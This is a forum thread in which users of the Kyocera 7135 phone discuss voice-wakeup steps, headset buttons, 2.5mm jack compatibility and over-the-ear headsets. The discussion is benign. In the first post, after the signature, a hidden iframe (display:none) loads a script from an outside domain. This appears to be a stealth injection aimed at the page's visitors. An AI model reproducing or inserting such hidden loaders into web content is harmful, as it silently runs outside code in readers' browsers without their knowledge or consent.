+ Reply to Thread

Thread: voice wakeup

Bit pusher

voice wakeup

I would like to wakeup the phone and voice dial while it is folded up (closed) and while using a headset. How do I do this??
    Reading page 45 of the user manual it says all I have to do is check Voice Answer and Voice Wakeup which I've done. I've also done the voice training. The phone's help screen says I need to say "wakeup" twice, which I've tried. So I believe I've done everything the manual and phone asks me to do but nothing happens when I try this.

paul<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Bit pusher
    Okay, I've figured it out. You say wakeup once, wait for the beep, say wakeup again, wait for a couple of beeps, then give the voicedial command. It does need to be externall powered and you need to use a headset.

paul

Paul,

That function is mainly geared towards the use of the car kit without the headset. With the headset, you can just push the button on the mic to wake up the phone, with or without external power hooked up.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Bit pusher
    Originally posted by tmwebsites
    Paul,

That function is mainly geared towards the use of the car kit without the headset. With the headset, you can just push the button on the mic to wake up the phone, with or without external power hooked up.
    Thanks, but my headset doesn't have a button. I have a nice Plantronics over-the-ear headset which I really prefer over the cheesey ear buds. Maybe I should look for an over-the-ear headet with a button.

paul

Paul, this also works great with the jabra blue tooth head set, it even hangs the call up for you when you push the "Answer/Hang-up button. I even played mp3s through the headset (didn't sounds as good as the stereo headset but still worked).

cheers,

--terry
    --------------------------------------
    Enjoy the journey, it should be just as much fun as the destination.

AJR
    Originally posted by paulj1x
    Thanks, but my headset doesn't have a button. I have a nice Plantronics over-the-ear headset which I really prefer over the cheesey ear buds. Maybe I should look for an over-the-ear headet with a button.

paul
    I prefer the over-the-ear rather than the earbuds as well. But you have to make sure you get an over-the-ear from Verizon/Kyocera/OEM made for the 7135. I tried a few headsets (most were for the Nokia 33xx/51xx/83xx series) with a button and they didn't work at all. They all had 3 rings on the 2.5mm jack like the Kyocera 7135 earbuds, but the ones for the Nokia and Ericsson are apparently assigned differently and don't match up for the proper functions for the 7135.

I'm using the earbuds for now since all functions work correctly (button answer/hangup, voice dial, etc). If you find a really good, really inexpensive over-the-ear headset with button that is compatible with the 7135, or an adapter to clip on the earbuds to make it over-the-ear, please post it here! If anyone knows of any fully 7135 compatible over-the-ear headsets from Plantronics or other company, please post here!

Thanks!

Bit pusher
    With the headsets you tried, did the speakers and microphone work? If yes, my guess is that the problem wasn't with the ring assignment. To minimize the number of signals/rings generally the switch is set up to change the impendance of the microphone (by opening the connection) and this is detected. It's possible that the Kyocera headset uses a slightly different impendence microphone or switches in a resistor when the switch is opened. If you're at all handy with an Ohmeter you can figure this out.

paul

Coolcat made me a custom over the ear stereo headset with button/mic for my 7135. Works great!

AJR
    Originally posted by paulj1x
    With the headsets you tried, did the speakers and microphone work?
    No, nothing worked on any of the headsets I tried with the on/off button. In fact, what they would do when I plugged them in is act like I was pushing the on/off button on the headset and it wanted to dial the last number without me touching anything. The phone buttons were unresponsive... the phone was "frozen" until I removed the headset.

I believe most headsets work that don't have an on/off button. If anyone has a Plantronics M123-N2 for the Nokia 51xx series, can you try it on the 7135. I'd rather be comfortable with an over-the-ear headset than the earbuds. I also don't care about a stereo headset most of the time. I did find something called "Techno Comfort Clip" which is supposed to be an over-the-ear rubber adapter that converts an earbud into an over-the-ear. You can see it here (they are out of stock right now).

If we can start a list of headsets that are compatible with the 7135, it would be very helpful to all. I've created a thread called "Compatible Headsets for the 7135". I've added a few that I know of, but see if we can create a list helpful to everyone that includes all types of headsets (Wireless, over-the-ear, earbud, etc).

Bit pusher
    Originally posted by AJR
    ... I did find something called "Techno Comfort Clip" which is supposed to be an over-the-ear rubber adapter that converts an earbud into an over-the-ear....
    Generally ear buds have much less volume than over the ear speakers, so my guess is that you could barely hear the earbud with the above.

paul